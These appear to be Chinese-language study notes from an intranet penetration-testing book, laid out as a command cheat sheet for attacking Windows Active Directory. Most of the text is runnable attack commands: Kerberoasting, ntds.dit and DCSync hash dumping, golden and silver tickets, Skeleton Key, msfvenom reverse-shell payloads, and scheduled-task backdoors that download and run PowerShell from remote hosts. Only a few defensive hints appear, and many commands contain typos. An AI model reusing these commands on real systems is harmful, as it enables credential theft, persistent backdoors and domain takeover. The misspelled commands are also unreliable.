spn = serviceclass "/" hostname [":"port] ["/" servicename]

MSSQLSvc/computer1.pentest.com:1433
exchageMDB/EXCAS01.pentest.com Exchange服务
TERMSERV /EXAS.pentest.com rdp
WSMAN/ExCAS01.pentest.com

PowerShell-Ad-Recon工具包

https://github.com/PyroTek3/PowerShell-AD-Recon

所有spn服务扫描
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSInterestingServices

Import-Moudle .\Discover-PSInterestingServices
Discover-PSIntingService

Windows自带

setspn -T domain -q */*

Kerberoast

手动注册SPN

setspn -A MSSQLSvc/computer1.pentest.com:1433 mssql

查看用户所对应的SPN

setspn -L pentest.com\mssql

查看所有注册的SPN

setspn -T domain -q */*

adsiedit.msc查看用户spn以及其他高级属性
配置指定服务的登陆权限

gpedit.msc\Computer Configuration\Windows Settings\Security Settings\Local Policies\User Pights Assignment\Log on as a service

修改加密类型

gpedit.msc\Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Network security; Configure encryption types allowed

请求SPN Kerberos票据

Add-Type -AssmblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestor SecurityToken-ArgumentList "MSSQLSvc/computer1.pentest.com"

导出票据

kerberos::list /export

破解hash

https://github.com/nidem/kerberoast

python tgsrepcrack.py wordlist.txt mssql.kirbi

Exchange邮件服务器

Exchange邮件服务器

邮箱服务器（Mailbox Server）
托管邮箱、公共文件夹及相关消息数据

客户端访问服务器（Client Acess Server）
接收处理不同客户端请求

集线传输服务器（Hub Transport Server）
进出站规则、处理邮件正确分发，确保地址正确解析

统一消息服务器（Unified Messagine Server）
允许用户通过邮件发送存储语音和传真

边缘传输服务器（Edge Transport Server）
路由发往内/外部的邮件、反垃圾邮件、反病毒策略

访问接口

OWa(web邮箱)
domain/owa/

EAC（echange管理中心）
http://domain/ecp/

Outlook Anywhere
MAPI
Exchange ActiveSyne
Exchange Web Service

Exchange服务发现

基于端口扫描

nmap -A -O -av 192.168.100.190

SPN查询

setspn -T pentest.com -F -Q */*

Exchange基本操作

查看邮件数据库

powershell
add-pssnapin microsoft.exchange* 添加exchange管理单元
Get-MailboxDatabase -server "Exchange"

查询指定数据库
Get-MailboxDatabase -Identity 'Mailbox Database 1894576043' | Format-List Name,EdbFilePath,LogFolderPath

获取现有用户的邮件地址

Get-Mailbox | format-tables Name,WindowsEmailAddress

查看指定用户的邮箱使用信息

get-mailboxstatistics -identity administrator | Select DisplayName,ItemCount,TotailItemSize,LastLogonTime

获取用户邮箱中的邮件数量以及最后登陆时间

Get-Mailbox -ResultSize Unlimited | Get-MailboxStatistics | Sort-Object TotalItemSize -Descend

导出指定的电子邮件

后缀为pst

配置用户的导入/导出权限

(1)查看用户权限
Get-ManagementRoleAssignment -role "Mailbox import Export" | Format-List RoleAssigneeName

(2)添加权限
New-ManagementRoleAssignment -Name "Import Export_Domain Admins" -User "Administrator" -Role "Mailbox import Export"

(3)删除权限
Remove-ManagementRoleAssignment "Import Export_Domain Admins" -Confirm:$false

设置网络共享文件夹

UNC(通用命名规范)
ner share inetpub=c:\inetpub /grant:everyone,full

导出用户电子邮件

(1)powershell导出
New-MailboxExportRequest -Mailbox administrator -FilePath \\192.xxx.xxx.xxx\inetpub\administrator.pst
(2)图形化导出
192.168.100.194\ccp

管理导出请求

(1)查看之前产生的导出请求记录
Get-MailboxExportRequest

(2)将指定用户已完成导出请求删除
Remove-MailboxExportRequest -Identity Administrtor\mailboxexport

(3)删除所有导出记录
Get-MailboxExportRequest -Status Completed Remove-MailboxExportRequest

域控制器安全

使用卷影拷贝服务器提取ntds.dit

ntds.dit

存储用户名、散列值、组、GPP、Ou等数据库

通过ntdsutil.exe提取ntds.dit

为活动目录提供管理机制的命令行工具
适用于03、08、12

(1)创建快照
ntdsutil snapshot "activate instance ntda" create quit quit

(2)加载快照
ntdsutil snapshot" mount {GUID} "quit quit

(3)复制快照到本地
copy c:\$xxx\ntds.dit c:\temp\ntds.dit

(4)删除之前加载的快照
ntdsutil snapshot "unmount {GUID}" "delect {GID}" quit quit

(5)查看快照
ntdsutil snapshot "List All" quit quit

利用vssadmin提取ntds.dit

创建和删除卷影拷贝、列出卷影拷贝信息
适用于08、win7

创建c盘卷影拷贝
vssadmin create shadow /for=c:

复制卷影拷贝
copy ntds.dit c:\ntds.dit

删除快照
vssadmin delect shadow /for=c: /quiet

利用vssown.vbs提取

下载地址
https://raw.githubusercontent.com/borigue/ptscripts/master/windows/vssown.vbs

cscript vssown.vbs /start 启动
cscript vssown.vbs /create c 创建
cscript vssown.vbs /list 列出
cscript vssown.vbs /delect

使用ntdsutil的IFM(媒体创建)创建卷影拷贝

Nishang Copy-VSS.ps1 脚本
import-moudle .\Copy-VSS.ps1
Copy-vss

使用diskshadow导出ntds.dit(必须在c:\windows\system32中操作)

diskshadow.exe /? 查看帮助
将需要执行的命令导入command.txt文件
diskshadow.exe /s c:\command.txt 执行命令

导出ntds.dit的txt

//设置卷影拷贝
set context persistent nowriters
//添加卷
add volume c: alias someAlias
//创建快照
create
//分配虚拟磁盘盘符
expose %someAlias% k:
//将ntds.dit复制到c盘
exec "cmd.exe" /c copy k:\windows\NTDS\ntds.dit c:\ntds.dit
//删除所有快照
delect shadow all 
//列出系统中的卷影拷贝
list shadow all
//重置
reset
//退出
exit

diskshadow /s c:\command.txt

导出system.hive
reg save hkim\system c:\windows\temp\system.hive

监控卷影拷贝服务的使用情况

system event id 7036

导出ntds.dit 中的散列值

使用esedbexport 恢复ntds.dit

下载地址

https://github.com/libyal/libesedb/releases/download/20170121/libesedb-experimental-20170121.tar

导出netd.dit

 apt-get install autoconf automake autopoint libtool pkg-config
 ./configure
 make
 sudo make install 
 sudo ldconfig

 /usr/local/bin

使用

esedbexport -m tables ntds.dit 提取表信息

导出散列值

下载ntdsxtract
https://github.com/csababarta/ntdsxtract.git

python setup.py build && python setup.py install 安装ntdsxtract

将netds.dit.export 和sustem文件夹放入ntdsxtract文件夹
dsuser.py ntds.dit.export/database.3 ntds.dit.export/link_table.5 output --syshive SYSTEM --passwordhashes --pwdformat ocl --ntoutfile ntout --lmoutfile lmout | tee all_user.txt 将所有散列值导出到all_user.txt

dscomputers.py ntds.dit.export/database.3 computer_output --csvoutfile all_computers.csv 导出域内所有计算机的信息

impacket工具包导出散列值(secretsdump)

https://github.com/csababarta/ntdsxtract.git

python setup.py install

impacket-secretsdump -system SYSTEM -ntds ntds.dll LOCAL 导出所有散列值

impacket-secretsdump
-hashs aad3bxxxxx
-just-dc pentest.com/administrator@192.168.100.205 从远程域控制器中读取散列值

在windows下解析ntds.dit 导出域账号和散列值

https://github.com/zcgonvh/NTDSDumpEx/releases/download/v0.3/NTDSDumpEx.zip

NTDSDumpEx.exe -d ntds.dit -s system

利用dcsync获取域散列值

使用mimikatz转储域散列值(域管)

lsadump::dcsync /domain:pentest.com /all /csv 所有用户名的散列值

lsadump::dcsync /domain:pentest.com /user:syst1m
导出指定用户的散列值

privilege::debug
lsadump::lsa /inject 域控上转储lsass.exe dump散列值

使用dcsync获取域账户和域散列值

https://gist.github.com/monoxgas/9d238accd969550136db

Invoke-DCSync -PWDumpFormat

使用measploit获取域散列值

osexec_ntdsgrab

use auxiliary/admin/smb/psexec_ntdsgeab
RHOST、SMBDOMAIN、SMBUser、SMBPass参数

基于meterprter会话获取域账号和散列值

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.xxx.xxx.xxx LPORT = 5555 -f exe > s.exe

use windows/gather/credentials/domain_hashdump

使用vshadow.exe和QuarksPwDump.exe导出域账号和散列值

下载地址

https://github.com/quarkslab/quarkspwdump

ShadowCopy.vbs

setlocal
if NOT "%CALLBACK_SCRIPT%"=="" goto :IS_CALLBACK
set SOURCE_DRIVE_LETTER=%SystemDrive%
set SOURCE_RELATIVE_PATH=\windows\ntds\ntds.dit
set DESTINATION_PATH=%~dp0
@echo ...Determine the scripts to be executed/generated...
set CALLBACK_SCRIPT=%~dpnx0
set TEMP_GENERATED_SCRIPT=GeneratedVarsTempScript.cmd
@echo ...Creating the shadow copy...
"%~dp0vshadow.exe" -script=%TEMP_GENERATED_SCRIPT% -exec="%CALLBACK_SCRIPT%" %SOURCE_DRIVE_LETTER%
del /f %TEMP_GENERATED_SCRIPT%
@goto :EOF
:IS_CALLBACK
setlocal
@echo ...Obtaining the shadow copy device name...
call %TEMP_GENERATED_SCRIPT%
@echo ...Copying from the shadow copy to the destination path...
copy "%SHADOW_DEVICE_1%\%SOURCE_RELATIVE_PATH%" %DESTINATION_PATH%

esentutl /p /o ntds.dit 修复复制出来的ntds.dit

vshadows.exe

Kerberos域用户提权

PyKEK工具包

下载地址

https://github.com/mubix/pykek

工具

-u 用户名@域名
-s  用户sid
-d 域控制器地址
-p 明文密码
--rc4 在没明文密码情况下，通过NTLM Hash登陆

使用

wmic qfe get botfixid 查看补丁情况
whoami /user 查看用户SID
wmic useraccount get name,sid 获取域内所有用户的SID

ms14-068.exe -u 域成员名@域名 -s SID -d 域控制器地址 -p 域成员密码

清除票据
kerberos::purge

kerberos::ptc "TGT_user1@pentest.com.cache" 注入票据

goldenPac.py

命令格式

python goldenPac.py 域名/域成员用户:密码@域控制器地址

安装kerberos客户端

apt-get install krb5-user y

Metasploit

利用脚本

use auaxiliary/admin/kerberos/ms14_068_kerberos_checksum

格式转换，导出kirbi格式文件

kerberos::clist "a.bin" /export

生成反向shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST LPORT -f exe >shell.exe

票据注入

use exploit/mulit/reverse_tcp

load wiki
kerberos_ticket_use a.kirbi

高权限票据测试

use/exploit/windows/local/current_user_psexec

权限维持及防御

操作系统后门

粘滞键后门

替换

cd windows\system32
Move sethc.exe sethc.exe.bak
copy cmd.exe sethc.exe

Empire

usemoudle lateral_movement/invoke_wmi_debuggerinfo

set List shuteet
set ComputerName WIN7-64.shuteer.testlab
set TargetBinary sethc.exe
execute

注册表注入后门

Empire

usemoudle persistence/userland/registry

set Listener shuteer
set RegPath HKCU:Spftware\Microsoft\Windows\CurrentVersion\Run
execute

计划任务后门

Metasploit 模拟计划任务后门

use exploit/multi/script/web_delivery

（1）用户登陆
schtacks /create /tn WindowsUpdate /tr "c:\windows\system32\powershell.exe -WindowsStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://192.xxx.xxx.xxx/'")'" /sc onlogon /ru system

(2)系统启动
schtacks /create /tn WindowsUpdate /tr "c:\windows\system32\powershell.exe -WindowsStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://192.xxx.xxx.xxx/'")'" /sc onstart /ru system

(3)系统空闲
schtacks /create /tn WindowsUpdate /tr "c:\windows\system32\powershell.exe -WindowsStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://192.xxx.xxx.xxx/'")'" /sc onidle /i l

PowerSploit模拟生成后门

https://github.com/PowerShellMafia/PowerSploit/blob/master/Persistence/Persistence.psm1

创建后门。空闲状态下执行
shuteer.ps1为要执行的payload
Import-Moudle ./Persistence.psm1
$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
$ UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle Add-Persistence -FilePath ./shuteer.ps1 -ElevatedPersistenceOption
$ElevatedOptions - UserPersistenceOption $UserOptions -Verbose

Empire模拟后门

usemoudle persistence/elevated/schtasks
set DailyTime 16:17
set Listener test
execute

meterpreter后门

Persistence

Cymothoa后门

Cymothoa

WMI后门（管理员）

Empire Invoke-WMl模块
powershell/persistence/elevated/wmi

检查目标主机情况：
Get-WMIObject -Namespace root\Subscription -Class CommandLine EventConsumer -Fifter "Name='Update'"

修复：
删除自动运行的恶意wmi条目
使用Get-WMIObject命令删除持久化相关组件

WEB后门

Nishang

nishang\Antak-WebShell目录下

Weevely

https://github.com/epinna/weevely3

weevely 查看帮助
weevely   [cmd] 连接木马
weevely session [cmd] 加载会话
weevely generate  生成后门代理

weevely http://xxx.xxx.xxx.xxx/test.php test

system_info 系统信息
net_scan扫描端口
help 查看命令

webacoo后门

webacoo -h 查看帮助
webacoo -g -o /root/test.php 生成webshell

webacoo -t -u http://xxxtest/php
load  查看模块

ASPX meterpreter

shell_reverse_tcp payload

PHP meterpreter

php meterpreter payload

域控制器权限持久化

DSRM域后门

DSRM

目录服务恢复模式
使用DSRM账号恢复
03不使用
08需要安装KB961320补丁
08以后不需要

使用

mimikatz

获取krbtgt NTLM HASH
privilege::debug
lasdump::lsa /patch /name:krbtgt

获取DSRM账号的NTLM Hash
token:elevate
lsadump:sam

将DSRM账号和krbtgt的ntlm hash同步
NTDSUTIL
SET DSRM PASSWORD
SYNC FROM DOMAIN account krbtgt

查看是否同步成功
lsadump::sam

修改DSRM登陆方式
新建HKLM\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior为2
使用powershell更改
New-ItemProperty "hkim:system\currentrolset\control\lsa\" -name "dsemadminlogonbehavior" -value 2 -propertyType DWORD

使用dsrmz账号通过网络远程登陆域控制器
privilege::debug
sekurlsa:pth /domain:DC /user:administrator /ntlm:53ebxxxx

dcysnc转储krbtgt ntlm hash
lsadump::dcsync /domain:pentest.com /dc:dc /user:krbtgt

防御：
检查注册表
修改dsrm账号
经常检测ID为4794的日志

DerbyCON

比DSRM更为高级的一种方式，知道hash

Mimikatz “privilege::debug” “sekurlsa::pth /domain:ADSDC03 /user:Administrator /ntlm:7c08d63a2f48f045971bc2236ed3f3ac” exit

SSP

https://syst1m.com/post/security-support-provider/

SID History域后门

SID History

使A域中的syst1m用户的权限当syst1m用户迁移到B域中时还拥有原来的权限

查看test用户的SID history属性

Import-Moudle activedirectory
Get-ADUser test -Properties sidhistory

注入sid属性

privilege::debug
sid::add /sam:test /new:administrator

再次查看sid history

Get-ADUser test -Properties sidhistory.memberof

测试

dir \\dc\c$

防御

查看域用户sid为500的用户
完成迁移后，对相同500检测
定期检查id为4765和4766的日志、ID为4765为sid history属性添加到用户的日志。4766为将sid history属性添加到用户失败的日志

Golden Ticket(黄金票据)

环境

域控：192.168.100.205
域成员:192.168.100.146

导出krbtgt的ntlm hash

lsadump::dcsync /domain:pentest.com /user:krbtgt

获取基本信息

获取sid
wmic useraccount get name,sid

获取当前用户sid
whoami /user

查询域管理员账号
net group "domain admins" /domain

查询域名
ipconfig /all

实验

清空票据
kerberos::purge

生成票据
kerberos:golden /admin:Administrator /domain:pentest.com /sid:域SID /krbtgt:ntml hash /ticket:Administrator.kiribi

注入内存
kerberos::ptt Administrator.kiribi

检索当前会话中的票据
kerberos::tgt

验证权限
cscript wmiexec.vbs /shell dc

Silver Ticket(白银票据)

收集

域名
域SID
目标服务器的FQDN
可利用的服务
服务账号的NTLM Hash
需要伪造的用户名

实验

获取服务账号ntlm hash
mimikatz log "privilege::debug" "sekurlsa::logonpasswords"

清除票据
klist purge

伪造白银票据
kerberos::golden /domain:pentest.com /sid:域SID /target:dc.pentest.com /serviceLcifs /rc4:ntlm hash /user:syst1m /ptt

伪造LDAP 票据

Skeleton Key(万能密码)

使用域管账号密码连接

net use \\192.168.100.205\ipc$ "password" /user:pentest\administrator

添加万能密码

privilege::debug
misc::skeleton 注入万能密码

验证

删除原有ipc连接
net use
net usr \\dc\ipc$ /del /y

使用万能密码连接
net use \\dc\ipc$ "mimikatz" /user:administrator

Empire 中的Skeleton key

interact 进入agent
usemoudle persistence/misc/skeleton key* 加载模块
execute 执行模块

Hook PasswordChangeNotify

Hook PasswordChangeNotify

Hook PasswordChangeNotify作用是当用户修改密码后在系统中进行同步，密码符合要求的话，LSA会调用PasswordChangeNotify同步密码

使用

Import-Moudle .\Invoke-ReflectivePEInjection.ps1

注入HookPasswordChange.dll到内存
Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass

当被修改密码查看
type c:\windows\Temp\passwords.txt

Nishang下的脚本后门

HTTP-Backdoor脚本

可以下载和执行powershell脚本，接收第三方网站的执行，内存执行PowerShell脚本

CheckURL 给出一个URL地址，如果存在我们MagicString中的值就去执行Payload - 下载运行我们的脚本
PayloadURL 这个参数给出我们需要下载的Powershell脚本的地址
Arguments 这个参数指定我们要执行的函数
StopString 这个参数也会去看是否存在我们CheckURL返回的字符串，如果存在就会停止执行

PS > HTTP-Backdoor -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -PayloadURL http://pastebin.com/raw.php?i=Zhyf8rwh -Arguments Get-Information -MagicString start123 -StopString stopthis

Add-ScrnSaveBackdoor

可以帮助攻击者利用windows屏幕保护来安插一个隐藏后门

Execute-OnTime

用于在目标机器上指定powershell 脚本的执行时间

Invoke-ADSBackdoor

能够在NTFS数据流中留下一个永久性的后门,只有dir /a /r 才可以看到。

Invoke-ADSBackdoor -PayloadURL http://a.com/test.ps1

Cobalt Strike

功能

 agscript 拓展应用脚本
 c2lint 用于检查profile错误和异常
 teamserver 团队服务器程序
 cobaltsteike.jar 客户端
 logs 日志
 update.jar 更新
 data 保存当前teamserver 一些数据

Cs模块

Cobalt strike模块

后渗透模块

使用Elevate模块提升Beacon权限

右键->Acceess->Elevate

内置三个模块
（1）ms14-058 普通用户->sustem权限
（2）uac-dll bypassuac
（3）uac-token-duplication bypassuac

elevate uac-dll test
elevate uac-token-duplication test

Gold Ticket提升域管权限

access->Goldeb Ticket

查看用户所属的组
net user test /domain

make_token模拟指定用户

access->Make_token

Dump Hashes导出散列值

access->dump hashes
命令行：hashdump

logonpasswords模块

access->Run mimikatz
命令行：logonpasswords

查看导出的信息

View->Crededtials

mimikatz模块

mimikatz [moudle:command]

PsExec模块

Login->Psexec

SOCKS Server模块

Pivoting->SOCKS Server

###CS常用命令

基本命令

help 帮助
sleep  设置休眠时间

常用操作命令

getuid 哪个用户身份运行
getsystem 尝试获取system权限
getprivs 获取当前beacon包含的的所有权限

Explore->Browser Pivot
browserpivot [pid] [x86]x64]
browserpivot stop
劫持IE浏览器

文件管理

图形化：
    Explore->File Browser

命令行：
    cd
    ls
    mkdir 
    delect
    mv
    execute 执行文件

net view 命令

图形化：
    Explore->Net view
命令行：
    net view 显示域、资源列表
    net computer 查询域控制器上的计算机账户列表查找目标
    net dclist 列出域控制器
    net domain_trusts 列出域信息列表
    net group 枚举自身所在域控制器中的组
    net localgroup 枚举当前系统的本地组
    net logons 列出登陆的用户
    net session 列出会话
    net share 列出共享的目录和文件
    net user 列出用户
    net time 显示时间

端口扫描

Explore->Port scan

进程列表模块

Explore->Process List
命令行：
    ps
    kill [pid]

screenshot

图形：
    Explore->screenshot
命令行：
     screenshot
     screenshots pid s 定时截图

Log Keystrokes模块（键盘记录）

图形：
    Process List->Log KeyStrokes
命令行：
    keylogger [pid]

    view->Log Keystrokes 查看键盘记录

Inject 命令(注入新进程)

图形化：
    Process List->Inject
Becaon:
    inject [pid]

Steat Token模块

图形化：
    Process List->Steal token
Becaon:
    steat_token [pid]

Note模块

图形化：
    session->note
Becaon:
    note [text]

shell

shell command arg

run 程序 参数

execute（通常无回显）

execute 程序 参数

powershell

powershell command arg

powerpick(可以不通过调用powershell.exe 执行命令)

powerpick commandlet arg

powershell-import (可以直接本地powershell脚本加载到目标系统的内存中)

powershell-import /root/desktop/powerview.ps1
powershell Get-HostIP

Aggressor脚本

加载脚本

永久加载

load按钮-> xxx.cna

客户端加载

./agscript [host] [port][user][password][/path/to/script.cna]

> 笔记摘自：《内网安全攻防渗透测试实战指南》

内网渗透 – ChaBug安全

内网安全读书笔记

内网安全读书笔记

内网渗透测试基础

Powershell

内网信息搜集

收集本机信息

查询当前权限

探测域内存活主机

扫描域内端口

收集域内信息

查找域控制器

获取域内用户和管理员信息

定位域管理员

查找域管理员

域管理员模拟方法

PowerView

BloodHound

敏感数据的防护

隐藏通信隧道技术

隐藏通信隧道基础知识

判断内网连通性

网络层隧道（ipv6、icmp）

传输层隧道技术(tcp、udp、常规端口转发)

PowerCat(nc的powershell版本)

应用层隧道技术

ssh

http/https协议

DNS

dnscat2(支持多个会话)

iodine(支持linux、mac、windows)

SOCKS代理

压缩数据

上传和下载

权限提升分析及防御

系统内核溢出漏洞提权

通过手动执行命令发现缺失补丁

Windows操作系统配置错误利用

系统服务权限配置错误

注册表键AlwayslnstallElevated

可信任服务路径漏洞

计划任务

Empire

组策略首选项提权

组策略首选项提权

获取组策略凭据

BypassUAC（用户账户控制）

令牌窃取

添加域管理员

Empire下的令牌窃取

无凭证条件下的权限获取

域内横向移动分析及防御

常用windows远程连接和相关命令

IPC

使用windows自带工具获取远程主机信息

计划任务

windows系统散列值获取

单机密码抓取

通过SAM和system文件抓取密码

使用mimikatz在线读取SAM文件

使用mimikatz离线读取lsass.dmp文件

Powershell

使用Hashcat获取密码

防御攻击者抓取明文密码

哈希传递攻击

PsExec使用

psTools

metasploit中的psexec

WMI使用

永恒之蓝

smbexec使用

C++版smbexec

impacket工具包中的smbexec.py

Linux跨windows远程执行命令

DCOM在远程系统中的使用(分布式组件对象模型)

本地DCOM执行命令

SPN

SPN扫描

Kerberoast

Exchange邮件服务器